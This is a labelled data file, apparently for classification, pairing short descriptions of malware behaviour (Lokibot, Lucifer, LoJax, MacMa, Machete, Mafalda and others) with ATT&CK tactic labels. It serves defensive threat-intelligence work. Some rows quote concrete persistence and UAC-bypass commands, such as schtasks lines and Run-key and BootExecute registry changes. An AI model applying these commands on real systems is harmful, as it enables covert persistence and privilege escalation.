LitePower has the ability to download payloads containing system commands to a compromised host.,['TA0011:Command and Control']
LitePower can use various API calls.,['TA0002:Execution']
LitePower can use a PowerShell script to execute commands.,['TA0002:Execution']
LitePower can query the Registry for keys added to execute COM hijacking.,['TA0007:Discovery']
LitePower can create a scheduled task to enable persistence mechanisms.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
LitePower can take system screenshots and save them to `%AppData%`.,['TA0009:Collection']
LitePower can identify installed AV software.,['TA0007:Discovery']
LitePower has the ability to list local drives and enumerate the OS architecture.,['TA0007:Discovery']
LitePower can determine if the current user has admin privileges.,['TA0007:Discovery']
LitePower can use HTTP and HTTPS for C2 communications.,['TA0011:Command and Control']
Lizar has encrypted data before sending it to the server.,['TA0009:Collection']
Lizar can retrieve browser history and database files.,['TA0007:Discovery']
Lizar has a module to collect usernames and passwords stored in browsers.,['TA0006:Credential Access']
Lizar can decrypt its configuration data.,['TA0005:Defense Evasion']
Lizar has used the PowerKatz plugin that can be loaded into the address space of a PowerShell process through reflective DLL loading.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Lizar can collect email accounts from Microsoft Outlook and Mozilla Thunderbird.,['TA0007:Discovery']
Lizar can support encrypted communications between the client and server.,['TA0011:Command and Control']
"Lizar can download additional plugins, files, and tools.",['TA0011:Command and Control']
Lizar can run Mimikatz to harvest credentials.,['TA0006:Credential Access']
Lizar has used various Windows API functions on a victim's machine.,['TA0002:Execution']
Lizar can execute PE files in the address space of the specified process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Lizar has used PowerShell scripts.,['TA0002:Execution']
Lizar has a plugin designed to obtain a list of processes.,['TA0007:Discovery']
Lizar can migrate the loader into another process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Lizar can take JPEG screenshots of an infected system.,['TA0009:Collection']
Lizar can search for processes associated with an anti-virus product from list.,['TA0007:Discovery']
"Lizar can collect the computer name from the machine,.",['TA0007:Discovery']
Lizar can retrieve network information from a compromised host.,['TA0007:Discovery']
Lizar has a plugin to retrieve information about all active network sessions on the infected server.,['TA0007:Discovery']
Lizar can collect the username from the system.,['TA0007:Discovery']
Lizar has a command to open the command-line on the infected system.,['TA0002:Execution']
Lizar has a plugin that can retrieve credentials from Internet Explorer and Microsoft Edge using `vaultcmd.exe` and another that can collect RDP access credentials using the `CredEnumerateW` function.,['TA0006:Credential Access']
LoFiSe can collect files into password-protected ZIP-archives for exfiltration.,['TA0009:Collection']
LoFiSe can collect all the files from the working directory every three hours and place them into a password-protected archive for further exfiltration.,['TA0009:Collection']
LoFiSe has been executed as a file named DsNcDiag.dll through side-loading.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
LoFiSe can collect files of interest from targeted systems.,['TA0009:Collection']
"LoFiSe can monitor the file system to identify files less than 6.4 MB in size with file extensions including .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rtf, .tif, .odt, .ods, .odp, .eml, and .msg.",['TA0007:Discovery']
LoFiSe can save files to be evaluated for further exfiltration in the `C:\Programdata\Microsoft\` and `C:\windows\temp\` folders.,['TA0009:Collection']
LoJax has modified the Registry key ‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’ from ‘autocheck autochk *’ to ‘autocheck autoche *’.,['TA0005:Defense Evasion']
LoJax has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.,['TA0005:Defense Evasion']
LoJax has modified the Registry key ‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’ from ‘autocheck autochk *’ to ‘autocheck autoche *’ in order to execute its payload during Windows startup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.,['TA0005:Defense Evasion']
LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
LockerGoga has been observed changing account passwords and logging off current users.,['TA0040:Impact']
LockerGoga has been signed with stolen certificates in order to make it look more legitimate.,['TA0005:Defense Evasion']
"LockerGoga has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.",['TA0040:Impact']
"LockerGoga installation has been immediately preceded by a ""task kill"" command in order to disable anti-virus.",['TA0005:Defense Evasion']
LockerGoga has been observed deleting its original launcher after execution.,['TA0005:Defense Evasion']
"LockerGoga has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.",['TA0008:Lateral Movement']
LockerGoga has been observed shutting down infected systems.,['TA0040:Impact']
Lokibot has utilized multiple techniques to bypass UAC.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Lokibot has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.",['TA0006:Credential Access']
Lokibot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.,['TA0006:Credential Access']
"Lokibot has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR.",['TA0005:Defense Evasion']
Lokibot has the ability to initiate contact with command and control to exfiltrate stolen data.,['TA0010:Exfiltration']
Lokibot will delete its dropped files after bypassing UAC.,['TA0005:Defense Evasion']
Lokibot can search for specific files on an infected host.,['TA0007:Discovery']
Lokibot has the ability to copy itself to a hidden file and directory.,['TA0005:Defense Evasion']
Lokibot downloaded several staged items onto the victim's machine.,['TA0011:Command and Control']
Lokibot has the ability to capture input on the compromised host via keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Lokibot has tricked recipients into enabling malicious macros by getting victims to click ""enable content"" in email attachments.",['TA0002:Execution']
Lokibot has modified the Registry as part of its UAC bypass process.,['TA0005:Defense Evasion']
"Lokibot has used LoadLibrary, GetProcAddress and CreateRemoteThread API functions to execute its shellcode.",['TA0002:Execution']
Lokibot has obfuscated strings with base64 encoding.,['TA0005:Defense Evasion']
Lokibot has used PowerShell commands embedded inside batch scripts.,['TA0002:Execution']
Lokibot has used process hollowing to inject itself into legitimate Windows process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Lokibot has reflectively loaded the decoded DLL into memory.,['TA0005:Defense Evasion']
Lokibot embedded the commands schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I inside a batch script.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lokibot's second stage DLL has set a timer using “timeSetEvent” to schedule its next execution.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lokibot has used several packing methods for obfuscation.,['TA0005:Defense Evasion']
Lokibot is delivered via a malicious XLS attachment contained within a spearhpishing email.,['TA0001:Initial Access']
Lokibot has the ability to discover the computer name and Windows product name/version.,['TA0007:Discovery']
Lokibot has the ability to discover the domain name of the infected host.,['TA0007:Discovery']
Lokibot has the ability to discover the username on the infected host.,['TA0007:Discovery']
Lokibot has performed a time-based anti-debug check before downloading its third stage.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Lokibot has used VBS scripts and XLS macros for execution.,['TA0002:Execution']
Lokibot has used HTTP for C2 communications.,['TA0011:Command and Control']
Lokibot has used cmd /c commands embedded within batch scripts.,['TA0002:Execution']
LookBack side loads its communications module as a DLL into the libcurl.dll loader.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
LookBack has a function that decrypts malicious data.,['TA0005:Defense Evasion']
LookBack removes itself after execution and can delete files on the system.,['TA0005:Defense Evasion']
LookBack can retrieve file listings from the victim machine.,['TA0007:Discovery']
"LookBack has a C2 proxy tool that masquerades as GUP.exe, which is software used by Notepad++.",['TA0005:Defense Evasion']
LookBack uses a custom binary protocol over sockets for C2 communications.,['TA0011:Command and Control']
LookBack can list running processes.,['TA0007:Discovery']
LookBack sets up a Registry Run key to establish a persistence mechanism.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LookBack can take desktop screenshots.,['TA0009:Collection']
LookBack can kill processes and delete services.,['TA0040:Impact']
LookBack uses a modified version of RC4 for data transfer.,['TA0011:Command and Control']
LookBack can enumerate services on the victim machine.,['TA0007:Discovery']
LookBack can shutdown and reboot the victim machine.,['TA0040:Impact']
LookBack has used VBA macros in Microsoft Word attachments to drop additional files to the host.,['TA0002:Execution']
LookBack’s C2 proxy tool sends data to a C2 server over HTTP.,['TA0011:Command and Control']
LookBack executes the cmd.exe command.,['TA0002:Execution']
LoudMiner has obfuscated various scripts.,['TA0005:Defense Evasion']
"LoudMiner harvested system resources to mine cryptocurrency, using XMRig to mine Monero.",['TA0040:Impact']
LoudMiner is typically bundled with pirated copies of Virtual Studio Technology for Windows and macOS.,['TA0001:Initial Access']
LoudMiner has encrypted DMG files.,['TA0005:Defense Evasion']
LoudMiner deleted installation files after completion.,['TA0005:Defense Evasion']
"LoudMiner has set the attributes of the VirtualBox directory and VBoxVmService parent directory to ""hidden"".",['TA0005:Defense Evasion']
LoudMiner used SCP to update the miner from the C2.,['TA0011:Command and Control']
LoudMiner adds plist files with the naming format com.random_name.plist in the /Library/LaunchDaemons folder with the RunAtLoad and KeepAlive keys set to true.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LoudMiner launched the QEMU services in the /Library/LaunchDaemons/ folder using launchctl. It also uses launchctl to unload all Launch Daemons when updating to a newer version of LoudMiner.,['TA0002:Execution']
LoudMiner used an MSI installer to install the virtualization software.,['TA0005:Defense Evasion']
LoudMiner used the ps command to monitor the running processes on the system.,['TA0007:Discovery']
"LoudMiner has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.",['TA0005:Defense Evasion']
LoudMiner started the cryptomining virtual machine as a service on the infected machine.,['TA0002:Execution']
LoudMiner has monitored CPU usage.,['TA0007:Discovery']
LoudMiner used a script to gather the IP address of the infected machine before sending to the C2.,['TA0007:Discovery']
LoudMiner used shell scripts to launch various services and to start/stop the QEMU virtualization.,['TA0002:Execution']
LoudMiner used a batch script to run the Linux virtual machine as a service.,['TA0002:Execution']
LoudMiner can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lslsass can dump active logon session password hashes from the lsass process.,['TA0006:Credential Access']
Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.,['TA0011:Command and Control']
Lucifer can clear and remove event logs.,['TA0005:Defense Evasion']
"Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.",['TA0040:Impact']
Lucifer can decrypt its C2 address upon execution.,['TA0005:Defense Evasion']
Lucifer can exploit multiple vulnerabilities including EternalBlue and EternalRomance .,['TA0008:Lateral Movement']
Lucifer can download and execute a replica of itself using certutil.,['TA0011:Command and Control']
Lucifer can use certutil for propagation on Windows hosts within intranets.,['TA0008:Lateral Movement']
"Lucifer can execute TCP, UDP, and HTTP denial of service attacks.",['TA0040:Impact']
Lucifer can scan for open ports including TCP ports 135 and 1433.,['TA0007:Discovery']
Lucifer has attempted to brute force TCP ports 135 and 1433 with the default username or list of usernames and passwords.,['TA0006:Credential Access']
Lucifer can identify the process that owns remote connections.,['TA0007:Discovery']
Lucifer can check for existing stratum cryptomining information in HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%.,['TA0007:Discovery']
Lucifer can persist by setting Registry key values HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic and HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lucifer can infect victims by brute forcing SMB.,['TA0008:Lateral Movement']
Lucifer has established persistence by creating the following scheduled task schtasks /create /sc minute /mo 1 /tn QQMusic ^ /tr C:Users\%USERPROFILE%\Downloads\spread.exe /F.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Lucifer has used UPX packed binaries.,['TA0005:Defense Evasion']
Lucifer can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.,['TA0011:Command and Control']
"Lucifer can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Lucifer can collect the computer name, system architecture, default language, and processor frequency of a compromised host.",['TA0007:Discovery']
Lucifer can collect the IP address of a compromised host.,['TA0007:Discovery']
Lucifer can identify the IP and port numbers for all remote connections from the compromised host.,['TA0007:Discovery']
Lucifer has the ability to identify the username on a compromised host.,['TA0007:Discovery']
Lucifer can issue shell commands to download and execute additional payloads.,['TA0002:Execution']
Lucifer can use WMI to log into remote machines for propagation.,['TA0002:Execution']
LunarLoader has the ability to use Microsoft Outlook add-ins to establish persistence.,['TA0003:Persistence']
LunarLoader can deobfuscate files containing the next stages in the infection chain.,['TA0005:Defense Evasion']
LunarLoader can use the DNS domain name of a compromised host to create a decryption key to ensure a malicious payload can only execute against the intended targets.,['TA0005:Defense Evasion']
LunarLoader can use reflective loading to decrypt and run malicious executables in a new thread.,['TA0005:Defense Evasion']
LunarLoader can verify the targeted host's DNS name which is then used in the creation of a decyrption key.,['TA0007:Discovery']
LunarMail has the ability to use Outlook add-ins for persistence.,['TA0003:Persistence']
LunarMail can set the `PR_DELETE_AFTER_SUBMIT` flag to delete messages sent for data exfiltration.,['TA0005:Defense Evasion']
LunarMail can create an arbitrary process with a specified command line and redirect its output to a staging directory.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
LunarMail can decrypt strings to retrieve configuration settings.,['TA0005:Defense Evasion']
LunarMail has used RC4 and AES to encrypt strings and its exfiltration configuration respectively.,['TA0005:Defense Evasion']
LunarMail can use email image attachments with embedded data for receiving C2 commands and data exfiltration.,['TA0010:Exfiltration']
LunarMail can delete the previously used staging directory and files on subsequent rounds of exfiltration and replace it with a new one.,['TA0005:Defense Evasion']
LunarMail can search its staging directory for output files it has produced.,['TA0007:Discovery']
LunarMail can create a directory in `%TEMP%\` to stage data prior to exfilration.,['TA0009:Collection']
LunarMail can capture the recipients of sent email messages from compromised accounts.,['TA0009:Collection']
LunarMail can communicates with C2 using email messages via the Outlook Messaging API .,['TA0011:Command and Control']
LunarMail has been installed through a malicious macro in a Microsoft Word document.,['TA0002:Execution']
LunarMail can ping a specific C2 URL with the ID of a victim machine in the subdomain.,['TA0011:Command and Control']
LunarMail can capture screenshots from compromised hosts.,['TA0009:Collection']
LunarMail can parse IDAT chunks from .png files to look for zlib-compressed and AES encrypted C2 commands.,['TA0011:Command and Control']
LunarMail can capture environmental variables on compromised hosts.,['TA0007:Discovery']
LunarMail has been installed using a VBA macro.,['TA0002:Execution']
LunarWeb can zlib-compress data prior to exfiltration.,['TA0009:Collection']
LunarWeb can create a ZIP archive with specified files and directories.,['TA0009:Collection']
"LunarWeb can send short C2 commands, up to 512 bytes, encrypted with RSA-4096.",['TA0011:Command and Control']
LunarWeb can split exfiltrated data that exceeds 1.33 MB in size into multiple random sized parts between 384 and 512 KB.,['TA0010:Exfiltration']
LunarWeb can decrypt strings related to communication configuration using RC4 with a static key.,['TA0005:Defense Evasion']
The LunarWeb install files have been encrypted with AES-256.,['TA0005:Defense Evasion']
LunarWeb can self-delete from a compromised host if safety checks of C2 connectivity fail.,['TA0005:Defense Evasion']
LunarWeb has the ability to retrieve directory listings.,['TA0007:Discovery']
LunarWeb can capture information on group policy settings,['TA0007:Discovery']
LunarWeb can retrieve output from arbitrary processes and shell commands via a pipe.,['TA0002:Execution']
LunarWeb can discover local group memberships.,['TA0007:Discovery']
LunarWeb can use one C2 URL for first contact and to upload information about the host computer and two additional C2 URLs for getting commands.,['TA0011:Command and Control']
LunarWeb can identify shared resources in compromised environments.,['TA0007:Discovery']
LunarWeb has the ability to run shell commands via PowerShell.,['TA0002:Execution']
LunarWeb has used shell commands to list running processes.,['TA0007:Discovery']
LunarWeb can run a custom binary protocol under HTTPS for C2.,['TA0011:Command and Control']
LunarWeb has the ability to use a HTTP proxy server for C&C communications.,['TA0011:Command and Control']
LunarWeb has run shell commands to obtain a list of installed security products.,['TA0007:Discovery']
LunarWeb can list installed software on compromised systems.,['TA0007:Discovery']
LunarWeb can use Base64 encoding to obfuscate C2 commands.,['TA0011:Command and Control']
LunarWeb can receive C2 commands hidden in the structure of .jpg and .gif images.,['TA0011:Command and Control']
LunarWeb can send AES encrypted C2 commands.,['TA0011:Command and Control']
"LunarWeb can use WMI queries and shell commands such as systeminfo.exe to collect the operating system, BIOS version, and domain name of the targeted system.",['TA0007:Discovery']
LunarWeb can use shell commands to discover network adapters and configuration.,['TA0007:Discovery']
LunarWeb can enumerate system network connections.,['TA0007:Discovery']
LunarWeb can collect user information from the targeted host.,['TA0007:Discovery']
LunarWeb can pause for a number of hours before entering its C2 communication loop.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
LunarWeb can use `POST` to send victim identification to C2 and `GET` to retrieve commands.,['TA0011:Command and Control']
LunarWeb can run shell commands using a BAT file with a name matching `%TEMP%\<random_9_alnum_chars>.batfile` or through cmd.exe with the `/c` and `/U` option for Unicode output.,['TA0002:Execution']
LunarWeb can use WMI queries for discovery on the victim host.,['TA0002:Execution']
Lurid can compress data before sending it.,['TA0009:Collection']
Lurid performs XOR encryption.,['TA0011:Command and Control']
"MCMD has the ability to remove set Registry Keys, including those used for persistence.",['TA0005:Defense Evasion']
MCMD has the ability to upload files from an infected device.,['TA0009:Collection']
MCMD can modify processes to prevent them from being visible on the desktop.,['TA0005:Defense Evasion']
MCMD can upload additional files to a compromised host.,['TA0011:Command and Control']
MCMD has been named Readme.txt to appear legitimate.,['TA0005:Defense Evasion']
MCMD can Base64 encode output strings prior to sending to C2.,['TA0005:Defense Evasion']
MCMD can use Registry Run Keys for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
MCMD can use scheduled tasks for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
MCMD can use HTTPS in communication with C2 web servers.,['TA0011:Command and Control']
MCMD can launch a console process with redirected standard input and output.,['TA0002:Execution']
MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list.,['TA0009:Collection']
"MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.",['TA0009:Collection']
"After checking for the existence of two files, keyword_parm.txt and parm.txt, MESSAGETAP XOR decodes and read the contents of the files.",['TA0005:Defense Evasion']
"Once loaded into memory, MESSAGETAP deletes the keyword_parm.txt and parm.txt configuration files from disk.",['TA0005:Defense Evasion']
MESSAGETAP checks for the existence of two configuration files and attempts to read the files every 30 seconds.,['TA0007:Discovery']
MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system.,['TA0009:Collection']
"MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.","['TA0006:Credential Access', 'TA0007:Discovery']"
"After loading the keyword and phone data files, MESSAGETAP begins monitoring all network connections to and from the victim server.",['TA0007:Discovery']
MURKYTOP has the capability to schedule remote AT jobs.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
MURKYTOP has the capability to delete local files.,['TA0005:Defense Evasion']
MURKYTOP has the capability to retrieve information about users on remote hosts.,['TA0007:Discovery']
MURKYTOP has the capability to scan for open ports on hosts in a connected network.,['TA0007:Discovery']
MURKYTOP has the capability to retrieve information about shares on remote hosts.,['TA0007:Discovery']
MURKYTOP has the capability to retrieve information about groups.,['TA0007:Discovery']
MURKYTOP has the capability to identify remote hosts on connected networks.,['TA0007:Discovery']
MURKYTOP has the capability to retrieve information about the OS.,['TA0007:Discovery']
MURKYTOP uses the command-line interface.,['TA0002:Execution']
MacMa has the ability to record audio.,['TA0009:Collection']
MacMa can clear possible malware traces such as application logs.,['TA0005:Defense Evasion']
MacMa has been delivered using ad hoc Apple Developer code signing certificates.,['TA0005:Defense Evasion']
MacMa can collect then exfiltrate files from the compromised system.,['TA0009:Collection']
MacMa decrypts a downloaded file using AES-128-EBC with a custom delta.,['TA0005:Defense Evasion']
MacMa has used TLS encryption to initialize a custom protocol for C2 communications.,['TA0011:Command and Control']
MacMa exfiltrates data from a supplied path over its C2 channel.,['TA0010:Exfiltration']
MacMa can delete itself from the compromised computer.,['TA0005:Defense Evasion']
"MacMa can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders.",['TA0007:Discovery']
"MacMa has removed the `com.apple.quarantineattribute` from the dropped file, `$TMPDIR/airportpaird`.",['TA0005:Defense Evasion']
"MacMa has downloaded additional files, including an exploit for used privilege escalation.",['TA0011:Command and Control']
MacMa can dump credentials from the macOS keychain.,['TA0006:Credential Access']
"MacMa can use Core Graphics Event Taps to intercept user keystrokes from any text input field and saves them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords.","['TA0009:Collection', 'TA0006:Credential Access']"
"MacMa installs a `com.apple.softwareupdate.plist` file in the `/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, MacMa is executed from `/var/root/.local/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the MacMa only runs when there is a logged in GUI user.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
MacMa has stored collected files locally before exfiltration.,['TA0009:Collection']
MacMa has used macOS API functions to perform tasks.,['TA0002:Execution']
MacMa has used a custom JSON-based protocol for its C&C communications.,['TA0011:Command and Control']
MacMa has used TCP port 5633 for C2 Communication.,['TA0011:Command and Control']
MacMa can enumerate running processes.,['TA0007:Discovery']
MacMa can manage remote screen sessions.,['TA0008:Lateral Movement']
"MacMa has used Apple’s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows.",['TA0009:Collection']
"MacMa can collect information about a compromised computer, including: Hardware UUID, Mac serial number, macOS version, and disk sizes.",['TA0007:Discovery']
MacMa can collect IP addresses from a compromised host.,['TA0007:Discovery']
MacMa can collect the username from the compromised machine.,['TA0007:Discovery']
MacMa has the capability to create and modify file timestamps.,['TA0005:Defense Evasion']
MacMa can execute supplied shell commands and uses bash scripts to perform additional actions.,['TA0002:Execution']
MacSpy can record the sounds from microphones on a computer.,['TA0009:Collection']
MacSpy can steal clipboard contents.,['TA0009:Collection']
MacSpy deletes any temporary files it creates,['TA0005:Defense Evasion']
MacSpy stores itself in ~/Library/.DS_Stores/,['TA0005:Defense Evasion']
MacSpy captures keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
MacSpy persists via a Launch Agent.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
MacSpy uses Tor for command and control.,['TA0011:Command and Control']
MacSpy can capture screenshots of the desktop over multiple monitors.,['TA0009:Collection']
MacSpy uses HTTP for command and control.,['TA0011:Command and Control']
Machete saves the window names.,['TA0007:Discovery']
Machete stores zipped files with profile data from installed web browsers.,['TA0009:Collection']
Machete's collected data is encrypted with AES before exfiltration.,['TA0009:Collection']
Machete has used TLS-encrypted FTP to exfiltrate data.,['TA0011:Command and Control']
Machete captures audio from the computer’s microphone.,['TA0009:Collection']
Machete’s collected files are exfiltrated automatically to remote servers.,['TA0010:Exfiltration']
Machete retrieves the user profile data from Chrome and Firefox browsers.,['TA0007:Discovery']
Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events.,['TA0009:Collection']
"Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.",['TA0005:Defense Evasion']
Machete collects stored credentials from several web browsers.,['TA0006:Credential Access']
Machete searches the File system for files of interest.,['TA0009:Collection']
"Machete can find, encrypt, and upload files from fixed and removable drives.",['TA0009:Collection']
Machete’s downloaded data is decrypted using AES.,['TA0005:Defense Evasion']
Machete's collected data is exfiltrated over the same channel used for C2.,['TA0010:Exfiltration']
Machete has a feature to copy files from every drive onto a removable drive in a hidden folder.,['TA0010:Exfiltration']
"Machete has sent data over HTTP if FTP failed, and has also used a fallback server.",['TA0011:Command and Control']
"Once a file is uploaded, Machete will delete it from the machine.",['TA0005:Defense Evasion']
Machete uses FTP for Command & Control.,['TA0011:Command and Control']
Machete produces file listings in order to search for files to be exfiltrated.,['TA0007:Discovery']
Machete has the capability to exfiltrate stolen data to a hidden folder on a removable drive.,['TA0005:Defense Evasion']
Machete can download additional files for execution on the victim’s machine.,['TA0011:Command and Control']
Machete logs keystrokes from the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Machete stores files and logs in a folder on the local drive.,['TA0009:Collection']
"Machete renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.",['TA0005:Defense Evasion']
"Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.",['TA0005:Defense Evasion']
Machete detects the insertion of new devices by listening for the WM_DEVICECHANGE window message.,['TA0007:Discovery']
Machete has scanned and looked for cryptographic keys and certificate file extensions.,['TA0006:Credential Access']
Machete has a component to check for running processes to look for web browsers.,['TA0007:Discovery']
Machete is written in Python and is used in conjunction with additional Python scripts.,['TA0002:Execution']
Machete used the startup folder for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
The different components of Machete are executed by Windows Task Scheduler.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Machete sends stolen data to the C2 server every 10 minutes.,['TA0010:Exfiltration']
Machete captures screenshots.,['TA0009:Collection']
Machete has been packed with NSIS.,['TA0005:Defense Evasion']
Machete has used base64 encoding.,['TA0011:Command and Control']
Machete has used AES to exfiltrate documents.,['TA0011:Command and Control']
Machete collects the hostname of the target computer.,['TA0007:Discovery']
Machete collects the MAC address of the target computer and other network configuration information.,['TA0007:Discovery']
Machete uses the netsh wlan show networks mode=bssid and netsh wlan show interfaces commands to list all nearby WiFi networks and connected interfaces.,['TA0007:Discovery']
Machete takes photos from the computer’s web camera.,['TA0009:Collection']
Machete uses HTTP for Command & Control.,['TA0011:Command and Control']
Mafalda can use `AdjustTokenPrivileges` to elevate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Mafalda can collect the contents of the `%USERPROFILE%\AppData\Local\Google\Chrome\User Data\LocalState` file.,['TA0007:Discovery']
Mafalda can delete Windows Event logs by invoking the `OpenEventLogW` and `ClearEventLogW` functions.,['TA0005:Defense Evasion']
Mafalda can collect files and information from a compromised host.,['TA0009:Collection']
Mafalda can search for debugging tools on a compromised host.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Mafalda can decrypt files and data.,['TA0005:Defense Evasion']
Mafalda has been obfuscated and contains encrypted functions.,['TA0005:Defense Evasion']
Mafalda can send network system data and files to its C2 server.,['TA0010:Exfiltration']
Mafalda can establish an SSH connection from a compromised host to a server.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Mafalda can search for files and directories.,['TA0007:Discovery']
Mafalda can download additional files onto the compromised host.,['TA0011:Command and Control']
Mafalda can conduct mouse event logging.,"['TA0009:Collection', 'TA0006:Credential Access']"
Mafalda can create a named pipe to listen for and send data to a named pipe-based C2 server.,['TA0011:Command and Control']
Mafalda can dump password hashes from `LSASS.exe`.,['TA0006:Credential Access']
Mafalda can place retrieved files into a destination directory.,['TA0009:Collection']
Mafalda can create a token for a different user.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Mafalda can manipulate the system registry on a compromised host.,['TA0005:Defense Evasion']
Mafalda can use a variety of API calls.,['TA0002:Execution']
Mafalda can use raw TCP for C2.,['TA0011:Command and Control']
Mafalda can use port-knocking to authenticate itself to another implant called Cryshell to establish an indirect connection to the C2 server.,"['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Mafalda can execute PowerShell commands on a compromised machine.,['TA0002:Execution']
Mafalda can collect a Chrome encryption key used to protect browser cookies.,['TA0006:Credential Access']
Mafalda can enumerate running processes on a machine.,['TA0007:Discovery']
Mafalda can enumerate Registry keys with all subkeys and values.,['TA0007:Discovery']
Mafalda can take a screenshot of the target machine and save it to a file.,['TA0009:Collection']
"Mafalda can search for a variety of security software programs, EDR systems, and malware analysis tools.",['TA0007:Discovery']
"Mafalda can create a remote service, let it run once, and then delete it.",['TA0002:Execution']
Mafalda can encode data using Base64 prior to exfiltration.,['TA0011:Command and Control']
Mafalda can encrypt its C2 traffic with RC4.,['TA0011:Command and Control']
Mafalda can collect the computer name and enumerate all drives on a compromised host.,['TA0007:Discovery']
Mafalda can use the `GetAdaptersInfo` function to retrieve information about network adapters and the `GetIpNetTable` function to retrieve the IPv4 to physical network address mapping table.,['TA0007:Discovery']
Mafalda can use the GetExtendedTcpTable function to retrieve information about established TCP connections.,['TA0007:Discovery']
Mafalda can collect the username from a compromised host.,['TA0007:Discovery']
Mafalda can use HTTP for C2.,['TA0011:Command and Control']
Mafalda can execute shell commands using `cmd.exe`.,['TA0002:Execution']
MailSniper can be used to obtain account names from Exchange and Office 365 using the Get-GlobalAddressList cmdlet.,['TA0007:Discovery']
MailSniper can be used for password spraying against Exchange and Office 365.,['TA0006:Credential Access']
MailSniper can be used for searching through email in Exchange and Office 365 environments.,['TA0009:Collection']
"Manjusaka extracts credentials from the Windows Registry associated with Premiumsoft Navicat, a utility used to facilitate access to various database types.",['TA0006:Credential Access']
Manjusaka gathers credentials from Chromium-based browsers.,['TA0006:Credential Access']
